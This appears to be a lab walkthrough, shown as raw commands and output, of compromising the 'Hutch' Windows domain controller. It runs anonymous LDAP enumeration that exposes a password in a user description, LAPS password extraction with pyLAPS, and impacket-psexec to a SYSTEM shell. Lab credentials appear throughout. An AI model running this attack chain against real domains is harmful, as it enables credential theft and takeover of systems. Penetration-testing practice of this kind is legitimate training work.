Last updated
$ nmap -sC -sV -p- --min-rate 10000 -Pn -oN nmap 192.168.231.122
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-04 13:49 +08
Nmap scan report for 192.168.231.122
Host is up (0.0095s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
| Server Date: Tue, 04 Jun 2024 05:51:00 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
| WebDAV type: Unknown
| Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
|_ Server Type: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-04 05:50:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-06-04T05:51:02
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.69 seconds$ enum4linux -a 192.168.231.122
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jun 4 13:54:28 2024
=========================================( Target Information )=========================================
Target ........... 192.168.231.122
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==========================( Enumerating Workgroup/Domain on 192.168.231.122 )==========================
[E] Can't find workgroup/domain
==============================( Nbtstat Information for 192.168.231.122 )==============================
Looking up status of 192.168.231.122
No reply from 192.168.231.122
==================================( Session Check on 192.168.231.122 )==================================
[+] Server 192.168.231.122 allows sessions using username '', password ''
===============================( Getting domain SID for 192.168.231.122 )===============================
Domain Name: HUTCH
Domain Sid: S-1-5-21-2216925765-458455009-2806096489
[+] Host is part of a domain (not a workgroup)
=================================( OS information on 192.168.231.122 )=================================
[E] Can't get OS info with smbclient
[+] Got OS info for 192.168.231.122 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
======================================( Users on 192.168.231.122 )======================================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
================================( Share Enumeration on 192.168.231.122 )================================
do_connect: Connection to 192.168.231.122 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 192.168.231.122
==========================( Password Policy Information for 192.168.231.122 )==========================
[E] Unexpected error from polenum:
[+] Attaching to 192.168.231.122 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:192.168.231.122)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
[E] Failed to get password policy with rpcclient
=====================================( Groups on 192.168.231.122 )=====================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=================( Users on 192.168.231.122 via RID cycling (RIDS: 500-550,1000-1050) )=================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
==============================( Getting printer info for 192.168.231.122 )==============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Tue Jun 4 13:54:51 2024$ enum4linux -a -u 'guest' -p '' 192.168.231.122
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jun 4 13:56:03 2024
=========================================( Target Information )=========================================
Target ........... 192.168.231.122
RID Range ........ 500-550,1000-1050
Username ......... 'guest'
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==========================( Enumerating Workgroup/Domain on 192.168.231.122 )==========================
[E] Can't find workgroup/domain
==============================( Nbtstat Information for 192.168.231.122 )==============================
Looking up status of 192.168.231.122
No reply from 192.168.231.122
==================================( Session Check on 192.168.231.122 )==================================
[E] Server doesn't allow session using username 'guest', password ''. Aborting remainder of tests.$ ldapsearch -x -H ldap://192.168.231.122 -D '' -w '' -b "DC=hutch,DC=offsec"...
# Freddy McSorley, Users, hutch.offsec
dn: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Freddy McSorley
description: Password set to CrabSharkJellyfish192 at user's request. Please change on next login.
distinguishedName: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec
instanceType: 4
whenCreated: 20201104053505.0Z
whenChanged: 20210216133934.0Z
uSNCreated: 12831
uSNChanged: 49179
name: Freddy McSorley
objectGUID:: TxilGIhMVkuei6KplCd8ug==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132489437036308102
lastLogoff: 0
lastLogon: 132579563744834908
pwdLastSet: 132489417058152751
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnWwQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: fmcsorley
sAMAccountType: 805306368
userPrincipalName: fmcsorley@hutch.offsec
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec
dSCorePropagationData: 20201104053513.0Z
dSCorePropagationData: 16010101000001.0Z
lastLogonTimestamp: 132579563744834908
msDS-SupportedEncryptionTypes: 0
...B 192.168.231.122 445 HUTCHDC [*] Windows 10.0 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
SMB 192.168.231.122 445 HUTCHDC [+] hutch.offsec\fmcsorley:CrabSharkJellyfish192
SMB 192.168.231.122 445 HUTCHDC [+] Enumerated shares
SMB 192.168.231.122 445 HUTCHDC Share Permissions Remark
SMB 192.168.231.122 445 HUTCHDC ----- ----------- ------
SMB 192.168.231.122 445 HUTCHDC ADMIN$ Remote Admin
SMB 192.168.231.122 445 HUTCHDC C$ Default share
SMB 192.168.231.122 445 HUTCHDC IPC$ READ Remote IPC
SMB 192.168.231.122 445 HUTCHDC NETLOGON READ Logon server share
SMB 192.168.231.122 445 HUTCHDC SYSVOL READ Logon server share $ bloodhound-python -c all -d hutch.offsec -u fmcsorley -p CrabSharkJellyfish192 -ns 192.168.231.122
INFO: Found AD domain: hutch.offsec
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (hutchdc.hutch.offsec:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: hutchdc.hutch.offsec
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: hutchdc.hutch.offsec
INFO: Found 18 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: hutchdc.hutch.offsec
INFO: Done in 00M 04S$ ./pyLAPS.py --action get -u fmcsorley -d 'hutch.offsec' -p 'CrabSharkJellyfish192' --dc-ip 192.168.231.122
__ ___ ____ _____
____ __ __/ / / | / __ \/ ___/
/ __ \/ / / / / / /| | / /_/ /\__ \
/ /_/ / /_/ / /___/ ___ |/ ____/___/ /
/ .___/\__, /_____/_/ |_/_/ /____/ v1.2
/_/ /____/ @podalirius_
[+] Extracting LAPS passwords of all computers ...
| HUTCHDC$ : B8}2F5,4b03298
[+] All done!$ sudo crackmapexec smb 192.168.231.122 -u administrator -p 'B8}2F5,4b03298'
[sudo] password for ranay:
SMB 192.168.231.122 445 HUTCHDC [*] Windows 10.0 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
SMB 192.168.231.122 445 HUTCHDC [+] hutch.offsec\administrator:B8}2F5,4b03298 (Pwn3d!)$ impacket-psexec hutch.offsec/administrator:'B8}2F5,4b03298'@192.168.231.122
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
[*] Requesting shares on 192.168.231.122.....
[*] Found writable share ADMIN$
[*] Uploading file ZlWYNOKQ.exe
[*] Opening SVCManager on 192.168.231.122.....
[*] Creating service MoUL on 192.168.231.122.....
[*] Starting service MoUL.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system